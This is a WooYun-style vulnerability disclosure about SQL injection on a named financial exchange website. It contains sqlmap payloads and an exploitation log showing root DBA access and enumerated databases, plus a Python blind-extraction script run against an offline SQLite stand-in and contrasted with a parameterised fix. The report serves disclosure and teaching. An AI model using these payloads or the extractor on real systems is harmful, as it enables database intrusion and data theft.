WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ----------- http://drop.zone.ci/
2014-07-13: Details sent to the vendor, awaiting the vendor's handling
2014-07-18: Vendor confirmed; details disclosed to the vendor only
2014-07-28: Details disclosed to core white hats and relevant domain experts
2014-08-07: Details disclosed to regular white hats
2014-08-17: Details disclosed to intern white hats
2014-08-27: Details disclosed to the public
Two vulnerabilities in a provincial financial assets exchange: Struts2 and SQL injection
Sichuan Financial Assets Exchange, URL: http://www.scfae.com/
---
Place: GET
Parameter: class_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class_id=80' AND 6332=6332 AND 'UMJp'='UMJp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: class_id=80' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6b676a3a,0x474f5a426b46456a6745,0x3a716b733a),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: class_id=80' AND SLEEP(5) AND 'fHfq'='fHfq
---
[11:57:58] [INFO] testing MySQL
[11:57:58] [INFO] confirming MySQL
[11:57:58] [WARNING] reflective value(s) found and filtering out
[11:57:58] [INFO] the back-end DBMS is MySQL
[11:57:58] [INFO] fetching banner
[11:57:58] [INFO] actively fingerprinting MySQL
[11:57:58] [INFO] executing MySQL comment injection fingerprint
[11:57:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[11:57:59] [WARNING] unable to perform MySQL comment injection
web application technology: JSP
back-end DBMS: active fingerprint: MySQL >= 5.5.0
banner: '5.5.17'
[11:57:59] [INFO] fetching current user
current user: 'root@localhost'
[11:57:59] [INFO] fetching current database
current database: 'scfae'
[11:57:59] [INFO] testing if current user is DBA
[11:57:59] [INFO] fetching current user
current user is DBA: True
[11:58:00] [INFO] fetching database users
database management system users [19]:
[*] 'root'@'localhost'
[11:58:00] [INFO] fetching database users privileges
database management system users privileges:
[*] 'root'@'localhost' (administrator) [19]:
    privilege: ALTER
    privilege: CREATE
    privilege: CREATE TEMPORARY TABLES
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: UPDATE
[11:58:00] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead
[11:58:00] [INFO] fetching database users privileges
database management system users roles:
[*] 'root'@'localhost' (administrator) [38]:
    role: ALTER
    role: ALTER
    role: CREATE
    role: CREATE
    role: CREATE TEMPORARY TABLES
    role: CREATE TEMPORARY TABLES
    role: DELETE
    role: DELETE
    role: DROP
    role: DROP
    role: EXECUTE
    role: EXECUTE
    role: FILE
    role: FILE
    role: INDEX
    role: INDEX
    role: INSERT
    role: INSERT
    role: LOCK TABLES
    role: LOCK TABLES
    role: PROCESS
    role: PROCESS
    role: REFERENCES
    role: REFERENCES
    role: RELOAD
    role: RELOAD
    role: REPLICATION SLAVE
    role: REPLICATION SLAVE
    role: SELECT
    role: SELECT
    role: SHOW DATABASES
    role: SHOW DATABASES
    role: SHUTDOWN
    role: SHUTDOWN
    role: SUPER
    role: SUPER
    role: UPDATE
    role: UPDATE
[11:58:01] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] scfae
[*] test
[11:58:01] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, scfae, test'
Database: information_schema
[19 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
+---------------------------------------+
[11:58:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[11:58:01] [INFO] fetching current database
[11:58:01] [INFO] fetching columns for table 'CHARACTER_SETS' in database 'scfae'
[11:58:02] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:02] [INFO] retrieved:
[11:58:02] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[11:58:03] [INFO] retrieved:
[11:58:05] [INFO] fetching columns for table 'COLLATIONS' in database 'scfae'
[11:58:05] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:05] [INFO] retrieved:
[11:58:06] [INFO] retrieved:
[11:58:08] [INFO] fetching columns for table 'COLLATION_CHARACTER_SET_APPLICABILITY' in database 'scfae'
[11:58:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:08] [INFO] retrieved:
[11:58:10] [INFO] retrieved:
[11:58:11] [INFO] fetching columns for table 'COLUMNS' in database 'scfae'
[11:58:12] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:12] [INFO] retrieved:
[11:58:13] [INFO] retrieved:
[11:58:15] [INFO] fetching columns for table 'COLUMN_PRIVILEGES' in database 'scfae'
[11:58:15] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:15] [INFO] retrieved:
[11:58:17] [INFO] retrieved:
[11:58:18] [INFO] fetching columns for table 'ENGINES' in database 'scfae'
[11:58:18] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] yA
[12:11:00] [INFO] retrieved:
[12:11:01] [INFO] fetching columns for table 'EVENTS' in database 'scfae'
[12:11:01] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:01] [INFO] retrieved:
[12:11:03] [INFO] retrieved:
[12:11:04] [INFO] fetching columns for table 'FILES' in database 'scfae'
[12:11:05] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:05] [INFO] retrieved:
[12:11:06] [INFO] retrieved:
[12:11:08] [INFO] fetching columns for table 'GLOBAL_STATUS' in database 'scfae'
[12:11:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:08] [INFO] retrieved:
[12:11:10] [INFO] retrieved:
[12:11:11] [INFO] fetching columns for table 'GLOBAL_VARIABLES' in database 'scfae'
[12:11:12] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:12] [INFO] retrieved:
[12:11:13] [INFO] retrieved:
[12:11:15] [INFO] fetching columns for table 'KEY_COLUMN_USAGE' in database 'scfae'
[12:11:15] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:15] [INFO] retrieved:
[12:11:16] [INFO] retrieved:
[12:11:18] [INFO] fetching columns for table 'PARAMETERS' in database 'scfae'
[12:11:18] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:18] [INFO] retrieved:
[12:11:20] [INFO] retrieved:
[12:11:21] [INFO] fetching columns for table 'PARTITIONS' in database 'scfae'
[12:11:22] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:22] [INFO] retrieved:
[12:11:23] [INFO] retrieved:
[12:11:25] [INFO] fetching columns for table 'PLUGINS' in database 'scfae'
[12:11:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:25] [INFO] retrieved:
[12:11:27] [INFO] retrieved:
[12:11:28] [INFO] fetching columns for table 'PROCESSLIST' in database 'scfae'
[12:11:29] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:29] [INFO] retrieved:
[12:11:30] [INFO] retrieved:
[12:11:32] [INFO] fetching columns for table 'PROFILING' in database 'scfae'
[12:11:32] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:32] [INFO] retrieved:
[12:11:33] [INFO] retrieved:
[12:11:35] [INFO] fetching columns for table 'REFERENTIAL_CONSTRAINTS' in database 'scfae'
[12:11:36] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:36] [INFO] retrieved:
[12:11:37] [INFO] retrieved:
[12:11:39] [INFO] fetching columns for table 'ROUTINES' in database 'scfae'
[12:11:39] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:39] [INFO] retrieved:
[12:11:41] [INFO] retrieved:
[12:11:42] [INFO] fetching columns for table 'SCHEMATA' in database 'scfae'
[12:11:42] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:42] [INFO] retrieved:
[12:11:44] [INFO] retrieved:
Database: scfae
Table: ENGINES
[2 columns]
+--------+------+
| Column | Type |
+--------+------+
| `,`    |      |
| A      |      |
+--------+------+
[12:11:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[12:11:46] [INFO] fetched data logged to text files under 'c:\Python27\sqlmap\output\www.scfae.com'
[*] shutting down at 12:11:46
As above.
so?
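The sqlmap run above confirms three techniques on the class_id parameter: boolean-based blind, UNION and time-based blind. What follows is an added example, not code from the original report or from the target site, showing how a boolean-based blind payload of the page's shape (80' AND <condition> AND 'UMJp'='UMJp) turns a string-concatenated query into a true/false oracle, and how that oracle is then used to pull data out one character at a time, which is what the "retrieved:" lines in the log are doing. It uses an in-memory SQLite database as a stand-in for the JSP/MySQL back end (an assumption made so the example runs offline; the MySQL-only parts of the page's payloads, SLEEP(), the '#' comment terminator and CONCAT over 0x literals, are not exercised here), a constructed "news" table, and a hypothetical lookup function in both its concatenated and its parameterised form.

```python
import sqlite3

# Constructed stand-in for the target's JSP/MySQL back end: an in-memory SQLite
# database (assumption: SQLite, chosen so the example runs offline) holding a
# made-up 'news' table that is looked up by the class_id request parameter.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, class_id TEXT, title TEXT)")
    db.executemany(
        "INSERT INTO news (class_id, title) VALUES (?, ?)",
        [("80", "Listing A"), ("80", "Listing B"), ("81", "Other listing")],
    )
    return db


def vulnerable_lookup(db, class_id):
    """String concatenation: the defect that sqlmap's payload
    class_id=80' AND 6332=6332 AND 'UMJp'='UMJp relies on."""
    sql = "SELECT title FROM news WHERE class_id='" + class_id + "'"
    return [row[0] for row in db.execute(sql)]


def safe_lookup(db, class_id):
    """Parameterised version: the whole input is bound as one literal value,
    so the injected quote and AND clauses never reach the SQL parser."""
    sql = "SELECT title FROM news WHERE class_id=?"
    return [row[0] for row in db.execute(sql, (class_id,))]


def oracle(lookup, db, condition):
    """Boolean oracle in the shape of the page's payload: rows come back
    only when the injected condition is true."""
    payload = "80' AND " + condition + " AND 'UMJp'='UMJp"
    return len(lookup(db, payload)) > 0


def blind_extract(lookup, db, expr, max_len=64):
    """Recover the value of the SQL expression `expr` one character at a
    time by binary search over the oracle (ASCII assumed, ~7 requests per
    character). This is the loop behind sqlmap's 'retrieved:' lines."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop as soon as the string has no character at this position.
        if not oracle(lookup, db, "LENGTH((%s))>=%d" % (expr, pos)):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(lookup, db, "UNICODE(SUBSTR((%s),%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


# Scalar subquery for the first table name (SQLite's catalogue; on MySQL the
# equivalent would read information_schema.tables).
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)"

if __name__ == "__main__":
    db = build_db()
    tautology = "80' AND 6332=6332 AND 'UMJp'='UMJp"
    print("concatenated query, tautology payload:", vulnerable_lookup(db, tautology))
    print("parameterised query, same payload:    ", safe_lookup(db, tautology))
    print("blind-extracted first table name:     ", repr(blind_extract(vulnerable_lookup, db, FIRST_TABLE)))
    print("same extraction against safe query:   ", repr(blind_extract(safe_lookup, db, FIRST_TABLE)))
```

Against the concatenated query the tautology returns the class 80 rows and the extractor recovers the table name; against the parameterised query the identical input is just a non-matching literal, the oracle never returns true, and extraction yields nothing. With the root@localhost DBA account and FILE privilege the log reports, the same oracle would reach every database listed, which is why the fix has to be parameterisation (plus a least-privilege application account), not input filtering.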
Severity: High
Vulnerability rank: 13
Confirmed at: 2014-07-18 10:14
CNVD has confirmed and reproduced the described situation; it has been passed to CNCERT for dispatch to the Sichuan branch centre, which will follow up with the site's operating unit for handling. Rank 13, scored across the multiple vulnerabilities combined.
None for now